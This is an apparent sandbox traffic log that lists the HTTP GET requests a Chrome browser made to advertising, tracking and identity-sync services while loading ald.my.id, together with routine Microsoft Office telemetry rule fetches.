Source: global trafficHTTP traffic detected: GET /lt/c/3825/lt.min.js HTTP/1.1Host: tags.crwdcntrl.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /i/ca-pub-2542884292174911?href=https%3A%2F%2Fald.my.id&ers=2 HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /361726.gif?n=1&33random=1728897157218.1 HTTP/1.1Host: rc.rlcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /e/?v=1a&pid=5200&site=1&l=https%3A%2F%2Fald.my.id%2F&j=https%3A%2F%2Fald.my.id%2F HTTP/1.1Host: e.dtscout.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: m=1; st=1; df=1728897155; l=1040172889715587758A2B28B3F6BBD2
Source: global trafficHTTP traffic detected: GET /361726.gif?n=1&33random=1728897157218.4 HTTP/1.1Host: rc.rlcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pv/?_a=v&_h=ald.my.id&_ss=1dqyail9op&_pv=1&_ls=0&_u1=1&_u3=1&_cc=us&_pl=d&_cbid=6lao&_cb=_dtspv.c HTTP/1.1Host: t.dtscout.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: m=1; st=1; df=1728897155; l=1040172889715587758A2B28B3F6BBD2
Source: global trafficHTTP traffic detected: GET /b/p?id=wu!&lm=0&ts=1728897155274&dn=AFWU&iso=0&pu=https%3A%2F%2Fald.my.id%2F&r=https%3A%2F%2Fald.my.id%2F&t=Csh%20Verify&chpv=10.0.0&chuav=Google%20Chrome%3Bv%3D117.0.5938.134%2C%20Not%3BA%3DBrand%3Bv%3D8.0.0.0%2C%20Chromium%3Bv%3D117.0.5938.134&chp=Windows&chmob=0&chua=Google%20Chrome%3Bv%3D117%2C%20Not%3BA%3DBrand%3Bv%3D8%2C%20Chromium%3Bv%3D117 HTTP/1.1Host: ic.tynt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: uid=OY/j22cM4IWn+sRSNrMbgw==; pids=%5B%7B%22p%22%3A%220c1ae001bf%22%2C%22f%22%3A3%2C%22ts%22%3A1728897157218%7D%2C%7B%22p%22%3A%224bbb341d17%22%2C%22f%22%3A1%2C%22ts%22%3A1728897157218%7D%2C%7B%22p%22%3A%22e9b03986ff%22%2C%22f%22%3A2%2C%22ts%22%3A1728897157218%7D%5D
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /361726.gif?n=1&33random=1728897157218.6 HTTP/1.1Host: rc.rlcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /dpx?cid=11411&us_privacy=&33random=1728897157218.2&ref=https%3A%2F%2Fald.my.id%2F HTTP/1.1Host: i.simpli.fiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /dpx?cid=11411&us_privacy=&33random=1728897157218.5&ref=https%3A%2F%2Fald.my.id%2F HTTP/1.1Host: i.simpli.fiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pd/dtscout HTTP/1.1Host: pd.sharethis.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __stid=ZHoAA2cM4IQAAAAICdw7Aw==; __stidv=2
Source: global trafficHTTP traffic detected: GET /deb/v2?id=wu!&dn=AFWU&cc=1&chpv=10.0.0&chuav=Google%20Chrome%3Bv%3D117.0.5938.134%2C%20Not%3BA%3DBrand%3Bv%3D8.0.0.0%2C%20Chromium%3Bv%3D117.0.5938.134&chp=Windows&chmob=0&chua=Google%20Chrome%3Bv%3D117%2C%20Not%3BA%3DBrand%3Bv%3D8%2C%20Chromium%3Bv%3D117&r=https%3A%2F%2Fald.my.id%2F&pu=https%3A%2F%2Fald.my.id%2F HTTP/1.1Host: de.tynt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: uid=OY/j22cM4IWn+sRSNrMbgw==; pids=%5B%7B%22p%22%3A%220c1ae001bf%22%2C%22f%22%3A3%2C%22ts%22%3A1728897157218%7D%2C%7B%22p%22%3A%224bbb341d17%22%2C%22f%22%3A1%2C%22ts%22%3A1728897157218%7D%2C%7B%22p%22%3A%22e9b03986ff%22%2C%22f%22%3A2%2C%22ts%22%3A1728897157218%7D%5D
Source: global trafficHTTP traffic detected: GET /track/cmf/generic?ttd_pid=xksw9la&ttd_tpi=1&gdpr=0 HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /widget/?d=1040172889715587758A2B28B3F6BBD2&nid=300&p=2114454483&t=240&s=1280x1024x24&u=https%3A%2F%2Fald.my.id%2F&r=https%3A%2F%2Fald.my.id%2F HTTP/1.1Host: t.dtscdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: uid=1040172889715587758A2B28B3F6BBD2
Source: global trafficHTTP traffic detected: GET /pagead/adview?ai=CtiHwhOAMZ46MNdLp78EPn-jPyQnboZvOeo-Yz9CQE6yFu4fTOBABIKuv2JABYMkGoAGlxfPnA8gBAagDAcgDywSqBPYBT9Cep1guQNdWpPsrmNwBIZ2KcXe07fxUOlQoQaI0RONvZdfXKhZbO6f9rnrbOMDO2JUpIadxb9srUNd2EBCTqAdj3bLPaSgZ3jIVIzl7UU-IOFO-V5Pq9ASgMq0BtJZFMZtnquXJX1jNN5ovREKhjebK0Q2wP9xqO6BvKPIxFbDLSB9rwzaBdV3TiycQPFc9dN1KSBU7y9IVonucXuTQenZiUDUbEqL70-SjNPPllWiqjrLsIa4giBKMUBVgzttceF9DcNJAXT_EQ1EZbIvirQl9N7dDWyKg4AUS43spAXbfbAAhQI0ZXvSgf8nZldvdjThdeSvqwAT4h4n_hwWIBYO-m49RkgUECAQYAZIFBAgFGASgBi6AB8O6jBioB9XJG6gH2baxAqgHpr4bqAeOzhuoB5PYG6gH8OAbqAfulrECqAf-nrECqAevvrECqAf3wrEC2AcB8gcEEI2GdNIIJgiAYRABGB8yAooCOguAQIDAgICAoKiAAki9_cE6WNiQjOfDjYkDmglMaHR0cHM6Ly9nZXQubWFuYWdlZG1ldGhvZHMuY29tL2sxMi1jeWJlcnNlY3VyaXR5LXNhZmV0eS1rMTJkaXZlP2dhZF9zb3VyY2U9NYAKAcgLAdoMEQoLENDnsMekuoOYgwESAgED2BMK0BUBmBYBgBcBshceChoIABIUcHViLTI1NDI4ODQyOTIxNzQ5MTEYABgBuhcCOAGyGAkSAqRmGC4iAQDQGAE&sigh=cJUMEGU_6cU&uach_m=%5BUACH%5D&ase=2&cid=CAQSTwDpaXnfhIVrKubni22jrvJ193s0SUtKenR05Ckkb7AzizqZ1SmYpmZnI8rh5H_O6MTsFcTZgu04yoCtRSVKUMBwl229eFS4BBBIVgak2CYYAQ&template_id=5021&nis=6 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAttribution-Reporting-Eligible: event-source=navigation-source, triggerReferer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2542884292174911&output=html&h=250&slotname=3704632056&adk=1080356790&adf=1713894358&pi=t.ma~as.3704632056&w=300&abgtt=3&lmt=1728897154&format=300x250&url=https%3A%2F%2Fald.my.id%2F&wgl=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzQiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTM0Il0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzQiXV0sMF0.&dt=1728897152711&bpp=36&bdt=1799&idt=1960&shv=r20241009&mjsv=m202410080101&ptt=9&saldr=aa&abxe=1&cookie_enabled=1&eoidce=1&prev_fmts=243x600&correlator=2303771533125&frm=20&pv=1&u_tz=-240&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=525&ady=100&biw=1280&bih=907&scr_x=0&scr_y=0&eid=44759876%2C44759927%2C44759842%2C95338737%2C44798934%2C95343454%2C95344778&oid=2&pvsid=3856392468538169&tmod=1611993855&uas=0&nvt=2&ref=https%3A%2F%2Fald.my.id%2F&fc=896&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C984%2C1280%2C907&vis=1&rsz=%7C%7CfeE%7C&abl=CF&pfx=0&fu=0&bc=31&bz=1&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=2&uci=a!2&fsb=1&dtd=2199Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
Source: global trafficHTTP traffic detected: GET /1000.gif?memo=CP6JFhoNCIXBs7gGEgUI6AcQAEIASgA HTTP/1.1Host: rc.rlcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: rlas3=Br7g69ymsr9T4afkMmWoSWJwh7sRpLhxpejeyPFRRaA=; pxrc=CAA=
Source: global trafficHTTP traffic detected: GET /api/sync?pid=5324&_=2 HTTP/1.1Host: pippio.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /lt/c/16311/sync.min.js HTTP/1.1Host: tags.crwdcntrl.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://cdn-tc.33across.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pd/dtscout?_t_=px&url=https%3A%2F%2Fald.my.id%2F&event_source=dtscout&rnd=0.9666548919402609&exptid=ZHoAA2cM4IQAAAAICdw7Aw%3D%3D&fcmp=false HTTP/1.1Host: pd.sharethis.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __stid=ZHoAA2cM4IQAAAAICdw7Aw==; __stidv=2
Source: global trafficHTTP traffic detected: GET /w/1.0/cm?id=e508c905-ddce-4732-92a4-0b0f5b72a28f&r=https%3A%2F%2Fidsync.rlcdn.com%2F396846.gif%3Fserved_by%3Devergreen%26partner_uid%3D HTTP/1.1Host: us-u.openx.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /lt/c/3825/lt.min.js HTTP/1.1Host: tags.crwdcntrl.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/sync?pid=5324&it=1&iv=bb223ec720efd1a5bfb42707226896385053ef0e7abb66ab4369801d74f64181791426b5417dce21&_=2 HTTP/1.1Host: pippio.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: did=tFq1X5sQFdt_tbrT; didts=1728897158; nnls=; pxrc=CAA=
Source: global trafficHTTP traffic detected: GET /api/sync?pid=5324&_=2 HTTP/1.1Host: pippio.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: did=tFq1X5sQFdt_tbrT; didts=1728897158; nnls=; pxrc=CAA=
Source: global trafficHTTP traffic detected: GET /track/cmb/generic?ttd_pid=xksw9la&ttd_tpi=1&gdpr=0 HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: TDID=7d931d72-b6cd-40d8-9aaa-91033ac03d95; TDCPM=CAEYBSgCMgsI0p-yyuKOtj0QBTgB
Source: global trafficHTTP traffic detected: GET /i/ca-pub-2542884292174911?href=https%3A%2F%2Fald.my.id&ers=2 HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /f/AGSKWxUmsMqtSSePcx4h11wfZV5rxyGVnJAk3oRbeOgKg7Io4obCBjjBWNKhsHkvPsx3lQdQWEDqC1eiMud2YT43HJ5HwRq_9qwIjdhbtz3yndJAe8FOk_FaXhRHtllCX0s7Nhk82CqRrQ==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzI4ODk3MTU3LDYyNjAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzddXSwiaHR0cHM6Ly9hbGQubXkuaWQvIixudWxsLFtbOCwidGFCZ0d2UlFDMjAiXSxbOSwiZW4tVVMiXSxbMTgsIltbWzBdXV0iXSxbMTksIjIiXSxbMTcsIlswXSJdXV0 HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /w/1.0/cm?cc=1&id=e508c905-ddce-4732-92a4-0b0f5b72a28f&r=https%3A%2F%2Fidsync.rlcdn.com%2F396846.gif%3Fserved_by%3Devergreen%26partner_uid%3D HTTP/1.1Host: us-u.openx.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: i=ff675d27-c17a-4d2e-b7ab-ec29a6304351|1728897158
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /?partner=147&mapped=7d931d72-b6cd-40d8-9aaa-91033ac03d95&icm&gdpr=0&gdpr_consent=&cver HTTP/1.1Host: pixel.onaudience.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cookie=10907476198d4755; done_redirects147=1
